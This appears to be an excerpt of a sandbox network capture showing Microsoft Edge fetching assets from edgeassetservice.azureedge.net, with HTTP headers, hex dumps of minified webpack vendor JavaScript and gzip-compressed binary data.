                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:41 UTC15145INData Raw: 30 30 30 30 36 30 30 30 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 76 65 6e 64 6f 72 73 2e 37 65 32 37 63 63 61 36 30 32 37 62 38 64 36 36 39 37 63 62 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 3d 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 22 5d 2c 7b 37 33 30 34 30 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 7d 74 2e 65 78 70 6f 72 74 73 3d 65 2c 74 2e 65 78 70 6f 72 74 73 2e 48 74 74 70 73 41 67 65 6e 74 3d 65 7d 2c 31 33 30 31
                                                                                                                                                                                                                                                                                                                  Data Ascii: 00006000/*! For license information please see vendors.7e27cca6027b8d6697cb.js.LICENSE.txt */(self.edgeChromiumWebpackChunks=self.edgeChromiumWebpackChunks||[]).push([["vendors"],{73040:function(t){function e(){}t.exports=e,t.exports.HttpsAgent=e},1301
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:41 UTC9443INData Raw: 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 3f 3a 28 5c 5c 64 7b 34 7d 7c 5b 2b 2d 5d 5c 5c 64 7b 22 2b 28 34 2b 65 29 2b 22 7d 29 7c 28 5c 5c 64 7b 32 7d 7c 5b 2b 2d 5d 5c 5c 64 7b 22 2b 28 32 2b 65 29 2b 22 7d 29 24 29 22 29 2c 72 3d 74 2e 6d 61 74 63 68 28 6e 29 3b 69 66 28 21 72 29 72 65 74 75 72 6e 7b 79 65 61 72 3a 4e 61 4e 2c 72 65 73 74 44 61 74 65 53 74 72 69 6e 67 3a 22 22 7d 3b 76 61 72 20 69 3d 72 5b 31 5d 3f 70 61 72 73 65 49 6e 74 28 72 5b 31 5d 29 3a 6e 75 6c 6c 2c 6f 3d 72 5b 32 5d 3f 70 61 72 73 65 49 6e 74 28 72 5b 32 5d 29 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 7b 79 65 61 72 3a 6e 75 6c 6c 3d 3d 3d 6f 3f 69 3a 31 30 30 2a 6f 2c 72 65 73 74 44 61 74 65 53 74 72 69 6e 67 3a 74 2e 73 6c 69 63 65 28
                                                                                                                                                                                                                                                                                                                  Data Ascii: ion(t,e){var n=new RegExp("^(?:(\\d{4}|[+-]\\d{"+(4+e)+"})|(\\d{2}|[+-]\\d{"+(2+e)+"})$)"),r=t.match(n);if(!r)return{year:NaN,restDateString:""};var i=r[1]?parseInt(r[1]):null,o=r[2]?parseInt(r[2]):null;return{year:null===o?i:100*o,restDateString:t.slice(
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:41 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 75 78 2f 22 29 7d 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 5b 6e 5d 3d 74 5b 6e 5d 7d 29 29 7d 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 65 28 72 29 29 7b 76 61 72 20 69 3d 74 28 72 29 3b 72 65 74 75 72 6e 20 61 28 74 2c 6e 29 2c 69 7d 72 65 74 75 72 6e 7b 7d 7d 3b 72 65 74 75 72 6e 20 61 28 74 2c 6e 29 2c 6e 7d 2c 66 3d 22 52 4f 4f 54 22 2c 6c 3d 22 4e 41 4d 45 53 50 41 43 45 5f 52 4f 4f 54 22 2c 76 3d 22 43 48 49 4c 44 22 2c 64 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                                                                                  Data Ascii: 00006000ux/")},a=function(t,e){return Object.keys(t).forEach((function(n){return e[n]=t[n]}))},s=function(t,e){var n=function n(r){if(e(r)){var i=t(r);return a(t,n),i}return{}};return a(t,n),n},f="ROOT",l="NAMESPACE_ROOT",v="CHILD",d=function(t){return
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:41 UTC8204INData Raw: 65 3d 6c 5b 74 2e 63 68 61 72 41 74 28 6f 2b 2b 29 5d 3c 3c 31 38 7c 6c 5b 74 2e 63 68 61 72 41 74 28 6f 2b 2b 29 5d 3c 3c 31 32 7c 28 6e 3d 6c 5b 74 2e 63 68 61 72 41 74 28 6f 2b 2b 29 5d 29 3c 3c 36 7c 28 72 3d 6c 5b 74 2e 63 68 61 72 41 74 28 6f 2b 2b 29 5d 29 2c 69 2b 3d 36 34 3d 3d 3d 6e 3f 64 28 65 3e 3e 31 36 26 32 35 35 29 3a 36 34 3d 3d 3d 72 3f 64 28 65 3e 3e 31 36 26 32 35 35 2c 65 3e 3e 38 26 32 35 35 29 3a 64 28 65 3e 3e 31 36 26 32 35 35 2c 65 3e 3e 38 26 32 35 35 2c 32 35 35 26 65 29 3b 72 65 74 75 72 6e 20 69 7d 2c 4e 3d 6f 3f 74 3d 3e 61 74 6f 62 28 67 28 74 29 29 3a 63 3f 74 3d 3e 42 75 66 66 65 72 2e 66 72 6f 6d 28 74 2c 22 62 61 73 65 36 34 22 29 2e 74 6f 53 74 72 69 6e 67 28 22 62 69 6e 61 72 79 22 29 3a 4c 2c 44 3d 63 3f 74 3d 3e 70
                                                                                                                                                                                                                                                                                                                  Data Ascii: e=l[t.charAt(o++)]<<18|l[t.charAt(o++)]<<12|(n=l[t.charAt(o++)])<<6|(r=l[t.charAt(o++)]),i+=64===n?d(e>>16&255):64===r?d(e>>16&255,e>>8&255):d(e>>16&255,e>>8&255,255&e);return i},N=o?t=>atob(g(t)):c?t=>Buffer.from(t,"base64").toString("binary"):L,D=c?t=>p
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:41 UTC2479INData Raw: 30 30 30 30 30 39 41 33 0d 0a 72 63 65 2c 45 2e 65 78 65 63 28 74 29 29 3b 72 65 74 75 72 6e 20 65 2e 6c 61 73 74 49 6e 64 65 78 3d 74 2e 6c 61 73 74 49 6e 64 65 78 2c 65 7d 2c 78 3d 6e 28 35 36 31 33 37 29 2c 5f 3d 78 2e 5a 3f 78 2e 5a 2e 70 72 6f 74 6f 74 79 70 65 3a 76 6f 69 64 20 30 2c 53 3d 5f 3f 5f 2e 76 61 6c 75 65 4f 66 3a 76 6f 69 64 20 30 3b 76 61 72 20 54 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 53 3f 4f 62 6a 65 63 74 28 53 2e 63 61 6c 6c 28 74 29 29 3a 7b 7d 7d 2c 4c 3d 6e 28 39 37 35 35 38 29 3b 76 61 72 20 4e 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 73 77 69 74 63 68 28 65 29 7b 63 61 73 65 22 5b 6f 62 6a 65 63 74 20 41 72 72 61 79 42 75 66 66 65 72 5d
                                                                                                                                                                                                                                                                                                                  Data Ascii: 000009A3rce,E.exec(t));return e.lastIndex=t.lastIndex,e},x=n(56137),_=x.Z?x.Z.prototype:void 0,S=_?_.valueOf:void 0;var T=function(t){return S?Object(S.call(t)):{}},L=n(97558);var N=function(t,e,n){var r=t.constructor;switch(e){case"[object ArrayBuffer]
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:41 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 3d 6e 28 37 31 31 35 35 29 3b 65 2e 5a 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 73 29 7b 76 61 72 20 66 3d 2d 31 2c 6c 3d 69 2e 5a 2c 76 3d 21 30 2c 64 3d 74 2e 6c 65 6e 67 74 68 2c 70 3d 5b 5d 2c 68 3d 65 2e 6c 65 6e 67 74 68 3b 69 66 28 21 64 29 72 65 74 75 72 6e 20 70 3b 6e 26 26 28 65 3d 28 30 2c 75 2e 5a 29 28 65 2c 28 30 2c 63 2e 5a 29 28 6e 29 29 29 2c 73 3f 28 6c 3d 6f 2e 5a 2c 76 3d 21 31 29 3a 65 2e 6c 65 6e 67 74 68 3e 3d 32 30 30 26 26 28 6c 3d 61 2e 5a 2c 76 3d 21 31 2c 65 3d 6e 65 77 20 72 2e 5a 28 65 29 29 3b 74 3a 66 6f 72 28 3b 2b 2b 66 3c 64 3b 29 7b 76 61 72 20 67 3d 74 5b 66 5d 2c 5a 3d 6e 75 6c 6c 3d 3d 6e 3f 67 3a 6e 28 67 29 3b 69 66 28 67 3d 73 7c 7c 30 21 3d 3d 67 3f 67 3a 30 2c 76 26 26 5a 3d
                                                                                                                                                                                                                                                                                                                  Data Ascii: 00006000=n(71155);e.Z=function(t,e,n,s){var f=-1,l=i.Z,v=!0,d=t.length,p=[],h=e.length;if(!d)return p;n&&(e=(0,u.Z)(e,(0,c.Z)(n))),s?(l=o.Z,v=!1):e.length>=200&&(l=a.Z,v=!1,e=new r.Z(e));t:for(;++f<d;){var g=t[f],Z=null==n?g:n(g);if(g=s||0!==g?g:0,v&&Z=
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:41 UTC8204INData Raw: 6e 3a 64 65 6c 65 74 65 20 74 5b 63 5d 29 2c 69 7d 7d 2c 38 37 33 33 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 38 30 33 32 33 29 2c 69 3d 6e 28 33 36 31 32 29 2c 6f 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 2c 75 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 2c 63 3d 75 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 74 3f 5b 5d 3a 28 74 3d 4f 62 6a 65 63 74 28 74 29 2c 28 30 2c 72 2e 5a 29 28 75 28 74 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 2e 63 61 6c 6c 28 74 2c 65 29 7d 29 29 29 7d 3a 69 2e 5a 3b 65 2e 5a 3d
                                                                                                                                                                                                                                                                                                                  Data Ascii: n:delete t[c]),i}},87339:function(t,e,n){"use strict";var r=n(80323),i=n(3612),o=Object.prototype.propertyIsEnumerable,u=Object.getOwnPropertySymbols,c=u?function(t){return null==t?[]:(t=Object(t),(0,r.Z)(u(t),(function(e){return o.call(t,e)})))}:i.Z;e.Z=


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  36192.168.2.84980713.107.246.634431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:41 UTC711OUTGET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Edge-Asset-Group: EntityExtractionDomainsConfig
                                                                                                                                                                                                                                                                                                                  Sec-Mesh-Client-Edge-Version: 117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Sec-Mesh-Client-Edge-Channel: stable
                                                                                                                                                                                                                                                                                                                  Sec-Mesh-Client-OS: Windows
                                                                                                                                                                                                                                                                                                                  Sec-Mesh-Client-OS-Version: 10.0.19045
                                                                                                                                                                                                                                                                                                                  Sec-Mesh-Client-Arch: x86_64
                                                                                                                                                                                                                                                                                                                  Sec-Mesh-Client-WebView: 0
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:41 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                  Content-Length: 70207
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                  Last-Modified: Thu, 21 Nov 2024 04:18:43 GMT
                                                                                                                                                                                                                                                                                                                  ETag: 0x8DD09E3961B864F
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: f4d8a578-201e-0070-3324-3c1bc3000000
                                                                                                                                                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                  x-azure-ref: 20241121T144841Z-178bfbc474bkvpdnhC1NYCuu2w00000001ng00000000ka5t
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                  x-fd-int-roxy-purgeid: 69316365
                                                                                                                                                                                                                                                                                                                  X-Cache: TCP_MISS
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC15821INData Raw: 1f 8b 08 08 a3 b4 3e 67 02 ff 61 73 73 65 74 00 ec bd 0b 97 db 36 b2 30 f8 57 b2 b9 33 b3 dd 89 d5 d6 5b dd d9 cd fa f4 d3 f1 f8 39 6d 3b 19 db f1 d5 01 49 48 a2 45 91 0c 1f 6a ab c3 be bf 7d 0b 05 80 00 08 50 52 db ce 77 ef b7 67 67 9c 16 09 14 0a 40 a1 50 a8 2a 14 c0 3f bf f7 93 78 16 ce bf ff e9 bb 3f bf 2f 92 25 8d a7 51 b8 0a 0b 78 ef 8d bb dd 07 df 7d 9f 92 39 9d fa 65 91 cc 66 90 38 1c f4 59 62 40 67 a4 8c 8a 69 94 f8 24 a2 d3 15 49 11 81 c7 f0 c0 df 0e 3c 00 94 97 e3 6b de f1 08 7b a5 11 7b a5 51 67 9e e1 6b 8c af 71 a7 cc f1 15 81 69 de 59 7d c6 d7 02 5f 8b 0e a5 ec d5 c7 5c 3f ef f8 b7 ec 35 20 ec 35 20 9d 60 89 af 14 5f 69 27 40 e0 19 e6 ce 48 27 c4 8a 66 21 be 86 1d 78 60 af 19 be 66 9d 19 e6 2e b0 ec 82 76 c2 08 5f 31 77 91 75 16 3c b7 c4 d7
                                                                                                                                                                                                                                                                                                                  Data Ascii: >gasset60W3[9m;IHEj}PRwgg@P*?x?/%Qx}9ef8Yb@gi$I<k{{QgkqiY}_\?5 5 `_i'@H'f!x`f.v_1wu<
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC16384INData Raw: 2c 30 96 c2 52 09 74 65 c0 2a 8a c3 88 95 9c 7c 3e a9 79 09 d4 fa 9a 9f 30 4a 49 28 2b d7 97 ff 7a 7b f9 fa cd f4 c9 05 68 2b 37 9c c1 08 01 cb 2f 28 f3 02 34 de 08 0c a6 34 da 38 c6 ec 48 27 33 28 96 9f 45 d9 4f 9f 12 f7 54 d2 47 a6 39 87 08 81 e9 6d 4f c1 43 97 10 bf ad 59 55 67 39 13 fe 1e 05 67 65 16 87 6c 9b f5 cb 90 60 eb 3d ea 25 09 33 8b f9 4a fb 10 ef 11 3b 7c e8 61 60 14 a0 60 b9 7c 16 e7 69 54 b1 c3 22 c0 e0 29 df c2 05 4c 8f bc f0 67 5e 04 75 33 51 9a b7 e1 61 1a 61 48 f5 c3 30 f7 62 91 d5 a8 34 39 2a 97 ff 2d f5 aa c1 c2 6c 78 e0 35 33 d1 42 b3 75 c4 be 3b f4 d0 68 83 51 a7 81 2d a0 ff 0d 5d 10 62 ed 7f 55 a5 99 9f 25 2b 2f a4 4d 09 21 65 43 c7 04 cf 93 19 f3 c1 d0 b6 e9 14 38 59 31 29 8b 4d 52 3a c4 97 c1 d0 1d 5d d0 58 b3 51 22 09 e8 37 c0
                                                                                                                                                                                                                                                                                                                  Data Ascii: ,0Rte*|>y0JI(+z{h+7/(448H'3(EOTG9mOCYUg9gel`=%3J;|a``|iT")Lg^u3QaaH0b49*-lx53Bu;hQ-]bU%+/M!eC8Y1)MR:]XQ"7
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC16384INData Raw: d3 4d 9a a5 bf dc f0 20 15 b1 bc 1f 82 9a 8d 98 a7 af db 80 6b 74 e7 ab 7c e6 18 7d 9a 2b 3e 34 2d 1a e7 c0 d5 e8 b4 a0 0e d4 7d 19 bb 69 52 58 a2 33 32 78 db 4b 2d cd 54 dd d2 2b 9c a0 29 69 1a ba 4a ee 0a 4d 33 5a 7b a7 1a 83 5f f3 f7 fe 2c 2f 84 3b 39 d0 56 82 ef 75 a4 f3 69 57 af 58 09 8c 2a 1d 24 b9 4e 6b cf 63 d0 74 99 e3 02 0f 26 7f 1a 86 a9 a8 69 fa 5a d8 25 83 c1 ea f8 fd 12 62 16 86 38 17 5a 19 6f 13 03 00 e6 6a 07 a4 40 be bb 20 de a6 de bf d1 06 75 32 1f c3 4f 67 41 ad 31 bd b0 9c ee 44 47 33 2a 92 9c d3 f6 35 64 a9 b1 d3 f6 b1 c7 a7 b4 80 af ea c1 2a 6c dd 81 a0 0b 67 ca d2 b2 11 7c 8d dc 39 47 56 d1 bd 08 e8 ec 3e 4f c9 56 d6 7a d3 9a 56 4d 17 50 41 9b 17 9b 37 36 da 2e 7c a4 ba 63 f5 72 cd 6b 58 b5 9b 70 5a 19 73 3e 85 d2 c6 f8 80 22 71 cd
                                                                                                                                                                                                                                                                                                                  Data Ascii: M kt|}+>4-}iRX32xK-T+)iJM3Z{_,/;9VuiWX*$Nkct&iZ%b8Zoj@ u2OgA1DG3*5d*lg|9GV>OVzVMPA76.|crkXpZs>"q
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC16384INData Raw: 48 d1 b5 2e 37 a4 97 5f 43 54 c9 8d d7 76 7a 14 e4 6f 3b 80 f7 6a 61 e8 6f 47 e9 2d cb 60 84 66 2b c0 b9 77 09 1b c0 32 5c aa 6c 0e 25 81 ed a0 5e 61 25 37 6f 3c a5 bc 1f 04 1a dd b1 04 1d c9 73 16 3a 58 a8 69 4d 12 c1 5e e9 66 5f 14 6c e4 9e d4 61 25 e1 2f c3 fc b8 ed df 80 5d 2b 3a 5b 4c 56 c9 72 1f 59 1d 6a 72 0b d2 b0 4c 8e d5 67 db 16 79 41 90 65 4f 4b 68 63 f6 d1 e5 db b6 6a 18 e6 ca 5f 04 79 2e 71 69 5d 0e 19 cc d9 f6 58 27 58 af 1c 18 04 f1 98 d2 bf 15 1e 37 ce e0 1e 88 54 83 3c 82 f8 a8 05 5f b0 1b 3f 2f 02 8f 31 a4 e9 1d ed 45 e6 e4 85 e6 b9 66 4c fd cd 8d e4 58 f7 79 73 8b 47 40 25 b6 0d 7f 78 ff a8 fe e7 7d 69 4a fc 00 c7 b0 37 a9 44 f0 40 1e e8 bd 41 8a b4 0a 5d 5a 2c 0e 60 f7 fb 81 3b 35 42 38 50 3b bc 9c d4 76 22 35 66 3f 5d d9 fb 8e 7d 65
                                                                                                                                                                                                                                                                                                                  Data Ascii: H.7_CTvzo;jaoG-`f+w2\l%^a%7o<s:XiM^f_la%/]+:[LVrYjrLgyAeOKhcj_y.qi]X'X7T<_?/1EfLXysG@%x}iJ7D@A]Z,`;5B8P;v"5f?]}e
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC5234INData Raw: 4e 0f 79 ac a9 56 57 20 b1 61 ca d2 f5 ed 38 df 10 b9 60 88 4c 48 ac b1 cd 10 b5 8f 76 49 19 f2 b6 d5 54 1d d1 9c b1 20 7a d3 64 f7 91 a2 0c 4d 73 6d e0 da be ee e6 87 03 9f 5e f7 4f 98 9c 12 cd 88 68 4c 2e b1 48 00 60 c3 31 74 31 8d 87 b4 32 56 02 4f bf e1 a9 3b c0 40 d6 24 8e 10 55 c7 c3 e7 8c f3 78 28 78 d3 94 de b0 5a 4d 22 eb 28 5c 22 00 98 8e 15 1a f8 ab ac 54 f4 5d 80 d0 a5 aa 6e 87 83 fd d6 f1 b0 c0 82 f7 f4 5e ef 2f 2b b8 62 a2 13 a1 4d ae 60 cf 59 3c b1 b1 f4 40 4d 41 74 7c ac 2c 5a 9e ef f4 d2 81 6d 69 e1 d3 8b 73 2c 84 2c 06 37 fd 72 38 10 a5 b2 13 51 f1 a0 a2 06 7d 3f 89 8f 72 35 a0 58 a0 46 79 2f b7 1f cc 57 92 ec c8 b4 b5 f2 5c 65 e7 30 5a 93 e3 b1 8e 5f f5 91 44 87 44 19 1d 59 83 cf 54 85 de 92 34 2e 26 d2 d8 ca 80 2c 56 f9 34 27 86 21 28
                                                                                                                                                                                                                                                                                                                  Data Ascii: NyVW a8`LHvIT zdMsm^OhL.H`1t12VO;@$Ux(xZM"(\"T]n^/+bM`Y<@MAt|,Zmis,,7r8Q}?r5XFy/W\e0Z_DDYT4.&,V4'!(


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  37192.168.2.84980613.107.246.634431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:41 UTC470OUTGET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Edge-Asset-Group: Shoreline
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC557INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:42 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                  Content-Length: 306698
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                  Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT
                                                                                                                                                                                                                                                                                                                  ETag: 0x8DBC9B5C40EBFF4
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: 4f59e955-701e-0005-6024-3c9c78000000
                                                                                                                                                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                  x-azure-ref: 20241121T144841Z-178bfbc474b7cbwqhC1NYC8z4n00000001m0000000006bdx
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                  X-Cache: TCP_MISS
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC15827INData Raw: 1f 8b 08 08 cf 88 25 65 02 ff 61 73 73 65 74 00 ec 7d 69 93 db 46 92 e8 5f a9 f0 97 fd e0 96 05 10 00 09 4c c4 8b 17 2d f9 92 6d f9 92 6d 8d fd 66 43 51 00 0a 24 9a 20 40 e1 60 ab 7b 76 fe fb ab cc 2c 10 09 82 07 c8 a6 bc 9e 8d 0d 5b 68 b0 8e bc eb 44 55 e6 3f 3f 59 c9 3c 4d 54 55 bf db a8 b2 4a 8b fc 93 bf 89 4f dc cf ac cf ac 4f 6e c4 27 8b 26 7c 27 d7 eb 4a 27 fe bf 7f 7e 92 c6 90 19 c5 ee d4 f7 65 f0 4c f9 be ff cc f5 95 7c 26 63 df 7e 36 9b da 81 13 7b d3 d0 0e 15 d4 cd e5 4a 41 f9 77 ef 5e bf f9 ea 1d fc 7a f7 0e d2 19 1e fb 33 fd df 0c 12 63 55 45 65 ba ae 4d 06 d5 61 89 54 75 a9 1e 20 f7 f5 ab 57 2f 5e dd dd 7e ff 62 be 7c bf 58 a6 5f 05 f7 d6 8b db 9f be f8 f2 f6 f6 87 97 b7 3f f9 b7 90 ff 72 fe ad 7e ff e2 76 9d 58 77 ee 57 8b 1f de ff 14 f9 fe
                                                                                                                                                                                                                                                                                                                  Data Ascii: %easset}iF_L-mmfCQ$ @`{v,[hDU??Y<MTUJOOn'&|'J'~eL|&c~6{JAw^z3cUEeMaTu W/^~b|X_?r~vXwW
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC16384INData Raw: ee 07 cf ac 5b ca 81 54 5b 25 f6 36 51 93 15 e8 c2 2b 22 50 fc 52 36 6d 55 35 59 19 67 e4 56 be d8 2d df fd 8c 1c b1 48 e9 85 d8 d5 6f a1 88 16 05 b8 ea d5 42 20 2f c6 fa c5 ab 21 ae b4 7e 71 4c 7c 69 3b da be 2c c4 3c 45 31 58 f6 5a d0 75 29 2d 10 91 2f b6 81 a8 f1 77 27 4d cb 46 c3 d1 f2 cb e7 17 7d 3c d0 6a 30 b1 ed 19 11 24 85 30 ed b3 77 98 0a a3 d3 4d 8a a4 58 a6 1a 92 6f 39 a0 66 5b a9 58 c4 f8 d7 db 13 a4 38 9f 53 18 72 e3 d6 58 c9 9c 2a 85 f1 21 3d 9d 12 35 51 d6 f4 74 9e 6e f9 3a 6f 4c fc e5 2c 53 f9 7a 94 a9 7c 50 ab 8e d8 56 01 86 95 11 92 ce 4d 82 a9 12 26 c6 7f 9c 55 b4 0d eb a8 c4 4f 75 f1 df 12 7e 7b 85 2d 18 bd 99 6f 4d 95 18 8d 35 7f b9 51 da bc b3 17 f2 61 66 41 16 70 9d 0a 0c 87 07 e7 d4 da 16 34 27 65 eb d7 87 be 44 96 29 71 b2 3a d6
                                                                                                                                                                                                                                                                                                                  Data Ascii: [T[%6Q+"PR6mU5YgV-HoB /!~qL|i;,<E1XZu)-/w'MF}<j0$0wMXo9f[X8SrX*!=5Qtn:oL,Sz|PVM&UOu~{-oM5QafAp4'eD)q:
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:42 UTC16384INData Raw: 9d 6b d1 e4 03 44 91 0f c7 24 3e 9c a5 f8 80 ce e1 c3 bd 55 1f 7c 0d 7d f0 d6 f4 e1 f6 6d f9 6c 42 78 a7 7a 8f cf 80 2a 42 b1 ca af 46 95 01 06 85 53 be 7a 50 c8 12 ce 7e 7c 44 29 29 63 83 14 66 50 e5 69 9e ba 94 a2 14 a9 44 53 56 22 78 06 d0 d3 7d 25 3d 51 7e fc 63 e8 77 69 11 9c 24 cb 92 42 e9 e0 d4 ac cc c6 c2 0a 92 55 72 f4 61 88 91 31 1f 4c 69 b4 9b 0f a5 64 32 91 6a 99 5a 87 05 9b b8 18 4d b6 69 0c 05 60 46 80 c2 34 75 85 d5 88 cf a4 31 10 78 28 99 44 01 7e 6d 51 37 26 3d f1 aa c8 64 77 98 90 c3 4a 88 b9 d5 8c 73 bc 9b 5c 69 65 23 a6 fb 16 9b 26 25 05 ac fc cc 1e 87 56 e3 bd 7f 86 8d d9 de 4d 93 29 aa 7c fe d1 06 5b da c5 90 55 b0 c9 33 35 1b d9 51 ad b2 ea c6 9a c4 a2 90 04 54 de 86 42 2d d9 e8 78 24 ab 24 51 69 66 82 d7 44 e8 1d cf c8 e2 16 60 37
